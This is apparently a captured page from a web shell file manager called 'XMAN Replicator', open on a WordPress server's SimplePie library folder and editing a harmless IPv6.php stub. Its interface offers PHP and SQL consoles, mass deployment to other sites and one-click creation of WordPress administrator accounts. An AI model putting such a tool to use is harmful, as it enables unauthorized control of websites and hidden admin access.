🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
home
/
vestsxzf
/
public_html
/
wp-includes
/
SimplePie
/
library
/
SimplePie
/
Net
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-11-13 03:07
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-12-30 06:49
🔄
🗑️
🗑️📁
⬇️
🔒
IPv6.php
553 B
-rw-r--r--
2025-12-03 03:08
✏️
🔄
🗑️
⬇️
🔒
Edit: IPv6.php
<?php // SPDX-FileCopyrightText: 2004-2023 Ryan Parman, Sam Sneddon, Ryan McCue // SPDX-License-Identifier: BSD-3-Clause declare(strict_types=1); use SimplePie\Net\IPv6; class_exists('SimplePie\Net\IPv6'); // @trigger_error(sprintf('Using the "SimplePie_Net_IPv6" class is deprecated since SimplePie 1.7.0, use "SimplePie\Net\IPv6" instead.'), \E_USER_DEPRECATED); /** @phpstan-ignore-next-line */ if (\false) { /** @deprecated since SimplePie 1.7.0, use "SimplePie\Net\IPv6" instead */ class SimplePie_Net_IPv6 extends IPv6 { } }
Save
PHP Console
Execute
SQL Console
Execute